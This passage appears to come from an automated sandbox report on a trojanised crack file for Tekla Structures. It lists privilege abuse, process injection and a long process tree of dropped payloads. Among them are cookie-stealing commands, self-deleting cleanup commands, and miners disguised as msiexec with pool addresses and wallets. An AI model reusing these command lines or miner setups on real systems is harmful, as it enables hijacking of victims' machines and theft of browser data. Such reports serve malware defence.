bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 6 IoCs
pid Process 4156 PING.EXE 5320 PING.EXE 12988 PING.EXE 15020 PING.EXE 5156 PING.EXE 2004 PING.EXE -
Script User-Agent 10 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 299 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 570 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 574 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 597 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 601 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 150 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 158 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 294 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 565 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 576 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 2312 setups.tmp 2312 setups.tmp 204 tapinstall.exe 204 tapinstall.exe 204 tapinstall.exe 204 tapinstall.exe 204 tapinstall.exe 204 tapinstall.exe 204 tapinstall.exe 204 tapinstall.exe 204 tapinstall.exe 204 tapinstall.exe 204 tapinstall.exe 204 tapinstall.exe 204 tapinstall.exe 204 tapinstall.exe 204 tapinstall.exe 204 tapinstall.exe 204 tapinstall.exe 204 tapinstall.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 4060 Setup.exe Token: SeCreateTokenPrivilege 1504 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 1504 askinstall20.exe Token: SeLockMemoryPrivilege 1504 askinstall20.exe Token: SeIncreaseQuotaPrivilege 1504 askinstall20.exe Token: SeMachineAccountPrivilege 1504 askinstall20.exe Token: SeTcbPrivilege 1504 askinstall20.exe Token: SeSecurityPrivilege 1504 askinstall20.exe Token: SeTakeOwnershipPrivilege 1504 askinstall20.exe Token: SeLoadDriverPrivilege 1504 askinstall20.exe Token: SeSystemProfilePrivilege 1504 askinstall20.exe Token: SeSystemtimePrivilege 1504 askinstall20.exe Token: SeProfSingleProcessPrivilege 1504 askinstall20.exe Token: SeIncBasePriorityPrivilege 1504 askinstall20.exe Token: SeCreatePagefilePrivilege 1504 askinstall20.exe Token: SeCreatePermanentPrivilege 1504 askinstall20.exe Token: SeBackupPrivilege 1504 askinstall20.exe Token: SeRestorePrivilege 1504 askinstall20.exe Token: SeShutdownPrivilege 1504 askinstall20.exe Token: SeDebugPrivilege 1504 askinstall20.exe Token: SeAuditPrivilege 1504 askinstall20.exe Token: SeSystemEnvironmentPrivilege 1504 askinstall20.exe Token: SeChangeNotifyPrivilege 1504 askinstall20.exe Token: SeRemoteShutdownPrivilege 1504 askinstall20.exe Token: SeUndockPrivilege 1504 askinstall20.exe Token: SeSyncAgentPrivilege 1504 askinstall20.exe Token: SeEnableDelegationPrivilege 1504 askinstall20.exe Token: SeManageVolumePrivilege 1504 askinstall20.exe Token: SeImpersonatePrivilege 1504 askinstall20.exe Token: SeCreateGlobalPrivilege 1504 askinstall20.exe Token: 31 1504 askinstall20.exe Token: 32 1504 askinstall20.exe Token: 33 1504 askinstall20.exe Token: 34 1504 askinstall20.exe Token: 35 1504 askinstall20.exe Token: SeDebugPrivilege 204 tapinstall.exe Token: SeDebugPrivilege 2228 MicrosoftEdge.exe Token: SeDebugPrivilege 2228 MicrosoftEdge.exe Token: SeDebugPrivilege 2228 MicrosoftEdge.exe Token: SeDebugPrivilege 2228 MicrosoftEdge.exe Token: SeDebugPrivilege 4152 taskkill.exe Token: SeDebugPrivilege 4444 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4444 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4444 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4444 MicrosoftEdgeCP.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 3568 setups.exe 2312 setups.tmp 2228 MicrosoftEdge.exe 4376 MicrosoftEdgeCP.exe 4376 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 1192 wrote to memory of 2796 1192 Tekla_Structures_Extension_crack.exe 79 PID 1192 wrote to memory of 2796 1192 Tekla_Structures_Extension_crack.exe 79 PID 1192 wrote to memory of 2796 1192 Tekla_Structures_Extension_crack.exe 79 PID 2796 wrote to memory of 904 2796 cmd.exe 82 PID 2796 wrote to memory of 904 2796 cmd.exe 82 PID 2796 wrote to memory of 904 2796 cmd.exe 82 PID 2796 wrote to memory of 1408 2796 cmd.exe 83 PID 2796 wrote to memory of 1408 2796 cmd.exe 83 PID 2796 wrote to memory of 1408 2796 cmd.exe 83 PID 2796 wrote to memory of 4056 2796 cmd.exe 84 PID 2796 wrote to memory of 4056 2796 cmd.exe 84 PID 2796 wrote to memory of 4056 2796 cmd.exe 84 PID 2796 wrote to memory of 3888 2796 cmd.exe 85 PID 2796 wrote to memory of 3888 2796 cmd.exe 85 PID 2796 wrote to memory of 3888 2796 cmd.exe 85 PID 904 wrote to memory of 2028 904 keygen-pr.exe 86 PID 904 wrote to memory of 2028 904 keygen-pr.exe 86 PID 904 wrote to memory of 2028 904 keygen-pr.exe 86 PID 3888 wrote to memory of 4060 3888 keygen-step-4.exe 87 PID 3888 wrote to memory of 4060 3888 keygen-step-4.exe 87 PID 4056 wrote to memory of 2060 4056 keygen-step-3.exe 88 PID 4056 wrote to memory of 2060 4056 keygen-step-3.exe 88 PID 4056 wrote to memory of 2060 4056 keygen-step-3.exe 88 PID 2028 wrote to memory of 2652 2028 key.exe 90 PID 2028 wrote to memory of 2652 2028 key.exe 90 PID 2028 wrote to memory of 2652 2028 key.exe 90 PID 2060 wrote to memory of 2004 2060 cmd.exe 91 PID 2060 wrote to memory of 2004 2060 cmd.exe 91 PID 2060 wrote to memory of 2004 2060 cmd.exe 91 PID 4060 wrote to memory of 204 4060 Setup.exe 92 PID 4060 wrote to memory of 204 4060 Setup.exe 92 PID 4060 wrote to memory of 3568 4060 Setup.exe 93 PID 4060 wrote to memory of 3568 4060 Setup.exe 93 PID 4060 wrote to memory of 3568 4060 Setup.exe 93 PID 3568 wrote to memory of 2312 3568 setups.exe 94 PID 3568 wrote to memory of 2312 3568 setups.exe 94 PID 3568 wrote to memory of 2312 3568 setups.exe 94 PID 3888 wrote to memory of 1504 3888 keygen-step-4.exe 95 PID 3888 wrote to memory of 1504 3888 keygen-step-4.exe 95 PID 3888 wrote to memory of 1504 3888 keygen-step-4.exe 95 PID 1504 wrote to memory of 428 1504 askinstall20.exe 99 PID 1504 wrote to memory of 428 1504 askinstall20.exe 99 PID 1504 wrote to memory of 428 1504 askinstall20.exe 99 PID 428 wrote to memory of 4152 428 cmd.exe 101 PID 428 wrote to memory of 4152 428 cmd.exe 101 PID 428 wrote to memory of 4152 428 cmd.exe 101 -
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 10876 attrib.exe 10872 attrib.exe 12736 attrib.exe 9928 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Tekla_Structures_Extension_crack.exe"C:\Users\Admin\AppData\Local\Temp\Tekla_Structures_Extension_crack.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:2652
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:1408
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2004
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Users\Admin\AppData\Local\Temp\JGM8HA6887\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\JGM8HA6887\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
PID:204 -
C:\Users\Admin\AppData\Local\Temp\JGM8HA6887\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\JGM8HA6887\multitimer.exe" 1 3.1617436108.60681dcc80917 1016⤵PID:4604
-
C:\Users\Admin\AppData\Local\Temp\JGM8HA6887\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\JGM8HA6887\multitimer.exe" 2 3.1617436108.60681dcc809177⤵PID:4688
-
C:\Users\Admin\AppData\Local\Temp\zu1yjhfxjev\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\zu1yjhfxjev\KiffApp1.exe"8⤵PID:5244
-
-
C:\Users\Admin\AppData\Local\Temp\lk3bxdb3smn\vpn.exe"C:\Users\Admin\AppData\Local\Temp\lk3bxdb3smn\vpn.exe" /silent /subid=4828⤵PID:5520
-
C:\Users\Admin\AppData\Local\Temp\is-J7VVT.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-J7VVT.tmp\vpn.tmp" /SL5="$50366,15170975,270336,C:\Users\Admin\AppData\Local\Temp\lk3bxdb3smn\vpn.exe" /silent /subid=4829⤵PID:5644
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:4124
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:744
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:5800
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:204
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:12032
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵PID:13572
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\h4zvepx4aoh\dp3tleonxqy.exe"C:\Users\Admin\AppData\Local\Temp\h4zvepx4aoh\dp3tleonxqy.exe" /quiet SILENT=1 AF=7568⤵PID:5676
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\h4zvepx4aoh\dp3tleonxqy.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\h4zvepx4aoh\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617176555 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:5740
-
-
-
C:\Users\Admin\AppData\Local\Temp\0usxlffz04x\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\0usxlffz04x\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5628
-
-
C:\Users\Admin\AppData\Local\Temp\4szm0fc1qi3\z33drgx5pr5.exe"C:\Users\Admin\AppData\Local\Temp\4szm0fc1qi3\z33drgx5pr5.exe"8⤵PID:5416
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\4szm0fc1qi3\z33drgx5pr5.exe"9⤵PID:5944
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:4156
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0ao53sztt32\app.exe"C:\Users\Admin\AppData\Local\Temp\0ao53sztt32\app.exe" /8-238⤵PID:5340
-
C:\Users\Admin\AppData\Local\Temp\0ao53sztt32\app.exe"C:\Users\Admin\AppData\Local\Temp\0ao53sztt32\app.exe" /8-239⤵PID:14084
-
-
-
C:\Users\Admin\AppData\Local\Temp\ninsxiq1eb2\vict.exe"C:\Users\Admin\AppData\Local\Temp\ninsxiq1eb2\vict.exe" /VERYSILENT /id=5358⤵PID:5316
-
-
C:\Users\Admin\AppData\Local\Temp\ccfu0fn4vep\frfv3ax2dsm.exe"C:\Users\Admin\AppData\Local\Temp\ccfu0fn4vep\frfv3ax2dsm.exe" /ustwo INSTALL8⤵PID:5304
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "frfv3ax2dsm.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ccfu0fn4vep\frfv3ax2dsm.exe" & exit9⤵PID:4480
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "frfv3ax2dsm.exe" /f10⤵
- Kills process with taskkill
PID:5136
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5ampwh4fwph\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\5ampwh4fwph\cpyrix.exe" /VERYSILENT8⤵PID:5232
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:5928
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"10⤵PID:6128
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub10⤵PID:5664
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe11⤵PID:6124
-
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:4500
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:6456
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1sxnnmhkqe2\0f2esbhuftk.exe"C:\Users\Admin\AppData\Local\Temp\1sxnnmhkqe2\0f2esbhuftk.exe" /VERYSILENT8⤵PID:5220
-
-
C:\Users\Admin\AppData\Local\Temp\jegu4fdezea\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\jegu4fdezea\Setup3310.exe" /Verysilent /subid=5778⤵PID:5208
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\I7JB1X21CC\setups.exe"C:\Users\Admin\AppData\Local\Temp\I7JB1X21CC\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Users\Admin\AppData\Local\Temp\is-8L3MI.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-8L3MI.tmp\setups.tmp" /SL5="$701C6,635399,250368,C:\Users\Admin\AppData\Local\Temp\I7JB1X21CC\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2312
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4152
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"4⤵PID:4740
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:4800
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:4920
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵PID:4824
-
C:\Users\Admin\AppData\Roaming\3317.tmp.exe"C:\Users\Admin\AppData\Roaming\3317.tmp.exe"5⤵PID:1176
-
C:\Users\Admin\AppData\Roaming\3317.tmp.exe"C:\Users\Admin\AppData\Roaming\3317.tmp.exe"6⤵PID:4700
-
-
-
C:\Users\Admin\AppData\Roaming\354A.tmp.exe"C:\Users\Admin\AppData\Roaming\354A.tmp.exe"5⤵PID:5012
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:5196
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:5728
-
-
-
C:\Users\Admin\AppData\Roaming\36A3.tmp.exe"C:\Users\Admin\AppData\Roaming\36A3.tmp.exe"5⤵PID:4840
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\36A3.tmp.exe6⤵PID:18544
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:19200
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵PID:6072
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:5320
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵PID:5500
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵PID:6396
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"4⤵PID:7588
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:7968
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:9456
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2228
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:372
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4376
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4992
-
C:\Users\Admin\AppData\Local\Temp\is-VL2FA.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-VL2FA.tmp\Setup3310.tmp" /SL5="$D006A,138429,56832,C:\Users\Admin\AppData\Local\Temp\jegu4fdezea\Setup3310.exe" /Verysilent /subid=5771⤵PID:5468
-
C:\Users\Admin\AppData\Local\Temp\is-VNAVP.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-VNAVP.tmp\Setup.exe" /Verysilent2⤵PID:2708
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"3⤵PID:5408
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4472
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2712
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"3⤵PID:1796
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"3⤵PID:3084
-
C:\Users\Admin\AppData\Local\Temp\is-89NLJ.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-89NLJ.tmp\LabPicV3.tmp" /SL5="$60086,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"4⤵PID:3960
-
C:\Users\Admin\AppData\Local\Temp\is-L7HH7.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-L7HH7.tmp\ppppppfy.exe" /S /UID=lab2145⤵PID:5224
-
C:\Users\Admin\AppData\Local\Temp\64-e6df1-478-331bd-adb28edf0e594\Cexeqaezhaeje.exe"C:\Users\Admin\AppData\Local\Temp\64-e6df1-478-331bd-adb28edf0e594\Cexeqaezhaeje.exe"6⤵PID:3808
-
-
C:\Users\Admin\AppData\Local\Temp\c2-c8307-546-4d194-49de9e01ca9ba\Roxaqalizho.exe"C:\Users\Admin\AppData\Local\Temp\c2-c8307-546-4d194-49de9e01ca9ba\Roxaqalizho.exe"6⤵PID:5064
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0dcyen2u.kor\md6_6ydj.exe & exit7⤵PID:4528
-
C:\Users\Admin\AppData\Local\Temp\0dcyen2u.kor\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\0dcyen2u.kor\md6_6ydj.exe8⤵PID:19360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0zq1p20m.gdn\askinstall31.exe & exit7⤵PID:18696
-
C:\Users\Admin\AppData\Local\Temp\0zq1p20m.gdn\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\0zq1p20m.gdn\askinstall31.exe8⤵PID:18044
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:19016
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:4200
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vmy3gyqi.nac\toolspab1.exe & exit7⤵PID:18960
-
C:\Users\Admin\AppData\Local\Temp\vmy3gyqi.nac\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\vmy3gyqi.nac\toolspab1.exe8⤵PID:18732
-
C:\Users\Admin\AppData\Local\Temp\vmy3gyqi.nac\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\vmy3gyqi.nac\toolspab1.exe9⤵PID:18212
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4w1ctbn5.k0u\setup_10.2_mix.exe & exit7⤵PID:11316
-
C:\Users\Admin\AppData\Local\Temp\4w1ctbn5.k0u\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\4w1ctbn5.k0u\setup_10.2_mix.exe8⤵PID:11476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1lpuolyc.iwq\GcleanerWW.exe /mixone & exit7⤵PID:18720
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\143wl5d4.wtt\app.exe /8-2222 & exit7⤵PID:12000
-
C:\Users\Admin\AppData\Local\Temp\143wl5d4.wtt\app.exeC:\Users\Admin\AppData\Local\Temp\143wl5d4.wtt\app.exe /8-22228⤵PID:2692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1cf2dxa2.y5a\file.exe & exit7⤵PID:12684
-
C:\Users\Admin\AppData\Local\Temp\1cf2dxa2.y5a\file.exeC:\Users\Admin\AppData\Local\Temp\1cf2dxa2.y5a\file.exe8⤵PID:19288
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"9⤵PID:13332
-
C:\Users\Admin\AppData\Local\Temp\7PM5BVCZ40\setups.exe"C:\Users\Admin\AppData\Local\Temp\7PM5BVCZ40\setups.exe" ll10⤵PID:9532
-
